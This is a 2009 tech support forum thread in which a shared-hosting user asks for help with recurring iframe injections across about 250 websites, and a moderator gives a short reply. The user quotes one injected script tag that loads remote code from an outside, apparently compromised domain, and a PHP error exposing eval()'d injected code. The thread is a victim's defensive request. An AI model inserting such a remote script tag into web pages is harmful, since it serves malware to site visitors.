Welcome to Tech Support Forum home to more then 136,000 problems solved. Issues have included: Spyware, Malware, Virus Issues, Windows, Microsoft, Linux, Networking, Security, Hardware, and Gaming Getting your problem solved is as easy as:
1. Registering for a free account
2. Asking your question
3. Receiving an answer

Registered members:
* Get free support
* Communicate privately with other members (PM).
* Removal of this message
* See fewer ads.
* And much more..

 



Want to know how to post a question? click here Having problems with spyware and pop-ups? First Steps
Go Back   Tech Support Forum > Networking Forum > Security and Firewalls
User Name
Password
Site Map Register Donate Rules Blogs Mark Forums Read


Security and Firewalls Protecting you against unwanted people and programs

Reply
 
LinkBack Thread Tools
Old 10-30-2009, 01:03 PM   #1 (permalink)
Registered User
 
Join Date: Oct 2009
Posts: 4
OS: Debian 5, OS X Snow Leopard, Windows XP


Unix Server iFrame Injection, tried everything- please assist!

Hello,

I have an iframe injection problem that was likely originally caused by a Trojan on some windows machine (many people have FTP access to my server).
I am pretty tech savvy, but no sysadmin.
I know how to program (in C and others), and use unix (basic bash scripts)

My unix server hosts about 250 active websites and contains about 15GB of content. It's a shared server, so while I do have SSH access, I don't have root/superuser privileges (I can request package installs through my host's tech support though).

I cleared out my FTP usernames, changed passwords (FTP, SSH, Hosting), etc.
But I'm still getting injected with iframes all over the place.

Last month I was blacklisted, and I had to search for iframes, manually remove them all, and then use Google Webmaster tools to remove myself from "attack site" lists.

However I'm still getting injected left and right.
I tried using an iframe breaker javascript, but my attackers are just countering it with a more complex script of their owm :(

Would greatly appreciate any assistance.
Thanks.
Orun is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Reddit!
Reply With Quote
Important Information
Join the #1 Tech Support Forum Today - It's Totally Free!

TechSupportForum.com is a leading support website for your computer needs. We offer free, friendly and personalized computer support. Why pay to have your computer fixed when you can do it for free.

Join TechSupportforum.com Today - Click Here

Old 11-03-2009, 11:41 AM   #2 (permalink)
Registered User
 
Join Date: Oct 2009
Posts: 4
OS: Debian 5, OS X Snow Leopard, Windows XP


Mistake Re: Unix Server iFrame Injection, tried everything- please assist!

Is there another category or place where I could get some assistance on this matter?
If so, can this thread be moved there?

UPDATE:
I'm employing a new strategy to fend off these damn script kiddies. Will be changing the global php.ini settings and moving all config.php's into other directories.

They're employing a new method now, using a basic script to redirect to a third party site that has a page which injects iframes.. not really sure how to stop that.. the script looks like this:

Code:
<script src=http://certification.kz/templates/globals.php-off.php ></script>
It seems that the site in question is just another site they have exploited..

I also discovered that they were using our php config files against us, when I started getting this error (upon trying to ftp access the site)

Code:
Fatal error: Cannot redeclare fdhhw() (previously declared in /home6/arkdemoc/public_html/carrental/index.php(1) : 
eval()'d code:1) in /home6/arkdemoc/public_html/carrental/include/config.inc.php(1) : eval()'d code on line 1
Hopefully hiding the config.php's will fix that, but I could really use some assistance.

I'll be forever grateful to anyone who takes their time to assist!
Orun is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Reddit!
Reply With Quote
Old 11-06-2009, 12:55 AM   #3 (permalink)
Registered User
 
Join Date: Oct 2009
Posts: 4
OS: Debian 5, OS X Snow Leopard, Windows XP


Re: Unix Server iFrame Injection, tried everything- please assist!

:( I've been looking around the security section and none of the questions are remotely difficult, most can be solved with a Google query. Am I in the wrong category?
Orun is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Reddit!
Reply With Quote
Old 11-06-2009, 09:03 AM   #4 (permalink)
Manager, Networking Forums
 
johnwill's Avatar
 
Join Date: Sep 2002
Location: S.E. Pennsylvania, US
Posts: 41,580
OS: Windows 7, XP-Pro, Vista, Linux


Blog Entries: 1
Re: Unix Server iFrame Injection, tried everything- please assist!

I'm not sure there's another forum more suited, it appears you have a problem with malware still on that server from the description.

You're right, most of the questions here can be solved by a simple search, but many folks have no idea what to search for. You might say we're the "friendly" interface to the search engine.
__________________
If TSF has helped you, Tell us about it! or Donate to help keep the site up!

Microsoft MVP - Windows Desktop Experience
johnwill is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Reddit!
Reply With Quote
Reply


Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are Off
Pingbacks are Off
Refbacks are Off




All times are GMT -7. The time now is 02:23 AM.



Copyright 2001 - 2009, Tech Support Forum
Home Tips Plus | Outdoor Basecamp | Automotive Support Forum

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85